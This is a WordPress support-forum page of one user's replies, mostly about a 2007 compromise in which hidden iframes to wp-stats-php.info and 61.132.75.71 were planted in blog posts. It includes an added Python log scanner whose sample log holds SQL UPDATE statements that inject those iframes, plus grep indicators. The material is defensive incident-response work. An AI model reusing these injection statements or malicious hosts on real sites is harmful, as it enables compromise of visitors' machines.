Forum Replies Created

Viewing 6 replies - 1 through 6 (of 6 total)
  • Thread Starter keithwp

    (@keithwp)

    Appreciate the support @tobiasbg, I deactivated, deleted, and reinstalled 2.4.4. Everything works fine.

    Thanks!

    • This reply was modified 1 year, 5 months ago by keithwp. Reason: mark as resolved
    Thread Starter keithwp

    (@keithwp)

    The link to my site is http://www.techtravels.org

    I definitely need some specific suggestions on what to modify. I’ve got an approximate idea of what to do, but the change seems spread out enough that if someone could identify exactly what needs to be done, it would be really helpful!

    Thanks
    Keith

    @duskglow: excellent work isolating the problem and identifying an instant workaround/fix.

    Glad to see that the problem was found and the WordPress folks have released a patch.

    I’m sure a couple people here are happy to find out that they really weren’t crazy after all. 🙂

    Thanks

    While my host was of very little help, I’ve taken a couple steps to help mitigate future problems.

    I’m now backing up the db much more frequently, so I can compare and get an exact date when something was changed.

    I started blocking China (amongst other countries) from my website wholesale via .htaccess.

    I made a minor change to wp-db.php that records each and every query to a separate file with date/time and IP address stamps. My blog is not that busy/popular, and although it’s generating relatively large logs, space is available and cheap. Mind you, this is just sort of outbound queries to the database, NOT the results from the queries. I tested both posts and edit posts, and if WP is being used in the commission of the crime, then I’ll have an entry with some information. I’ve been grepping the logs for “iframe” and “wp-stats”, which I think is a very good indication something funny is going on.

    thanks
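An added example, not code from this thread or from WordPress: a small Python scanner that does what the post above describes by hand, reading a per-query log and flagging entries that contain the indicators the poster grepped for, and reporting the earliest time each one appeared so the change can be dated. The tab-separated log layout, the sample lines and the client IPs are assumptions made for the example; the indicator strings and the hosts in the sample iframes are the ones named in this thread.

```python
import re
from datetime import datetime

# Strings the poster grepped for; matched case-insensitively against each logged query.
INDICATORS = ("iframe", "wp-stats")

# Assumed layout of one log line written by the patched wp-db.php (not the real format):
#   <YYYY-MM-DD HH:MM:SS> TAB <client IP> TAB <SQL statement>
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\t(?P<ip>[^\t]+)\t(?P<sql>.*)$"
)

def scan_query_log(lines):
    """Return (hits, first_seen): hits lists (timestamp, client ip, verb, indicators)
    for each query containing an indicator; first_seen maps each indicator to the
    earliest timestamp it appeared, the date the poster wants for bracketing the change."""
    hits, first_seen = [], {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than abort the whole scan
        sql = m.group("sql")
        matched = [ind for ind in INDICATORS if ind in sql.lower()]
        if not matched:
            continue
        ts = datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S")
        verb = sql.split(None, 1)[0].upper()  # INSERT/UPDATE matter most; a SELECT may be benign
        hits.append((ts, m.group("ip"), verb, matched))
        for ind in matched:
            if ind not in first_seen or ts < first_seen[ind]:
                first_seen[ind] = ts
    return hits, first_seen

# Constructed sample log: two ordinary queries and two that plant the iframe the
# thread describes. Client IPs are documentation addresses, not real visitors.
SAMPLE_LOG = [
    "2007-11-12 08:15:02\t192.0.2.10\tSELECT * FROM wp_posts WHERE ID = 42",
    "2007-11-13 23:41:57\t198.51.100.23\tUPDATE wp_posts SET post_content = CONCAT(post_content, "
    "'<iframe src=\"http://wp-stats-php.info/wp-stats.php\" width=0 height=0></iframe>') WHERE ID = 42",
    "2007-11-14 00:02:11\t198.51.100.23\tUPDATE wp_posts SET post_content = CONCAT(post_content, "
    "'<iframe src=\"http://61.132.75.71/wp-stats.php\"></iframe>') WHERE ID = 43",
    "2007-11-14 09:30:00\t192.0.2.10\tSELECT option_value FROM wp_options WHERE option_name = 'siteurl'",
]

if __name__ == "__main__":
    hits, first_seen = scan_query_log(SAMPLE_LOG)
    for ts, ip, verb, matched in hits:
        print(f"{ts} {ip} {verb} matched={','.join(matched)}")
    for ind, ts in first_seen.items():
        print(f"first '{ind}' seen at {ts}")
```

On a real log the first_seen timestamps give the lower bound of the compromise window that the poster's backups could then be compared against.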

    I’m checking with my shared hosting provider if I can get access to the mysql logs.

    In the interim, is there a way of determining when your particular WordPress installation was upgraded? Maybe looking at file dates? Or do database entries contain a version stamp of the WP that wrote it, etc.?

    Thanks

    For what it’s worth, this happened to me as well.

    Sometime between 10-31-2007 and today. AVG alerted one of my users today who reported

    “AVG antivirus pops up two warnings: one for JS/Downloader Agent, and one for ‘Exploit.'”

    Also iframes, hosts (www.)wp-stats-php.info and 61.132.75.71, both serving up wp-stats.php. As soon as I did a whois on the domains and saw they were China, I knew something was afoot.

    I was either running wp version 2.2 OR 2.3.1, I simply can’t narrow everything down. Even if I knew when I upgraded to 2.3.1, I still don’t know when the attacker performed the SQL injection, or whatever it was.

    I used phpMyAdmin to search the database for “wp-stats” and that located the troublesome posts.

    Is there any definitive answer yet as to how/why/only 2.2 was vulnerable, etc?

    Thanks
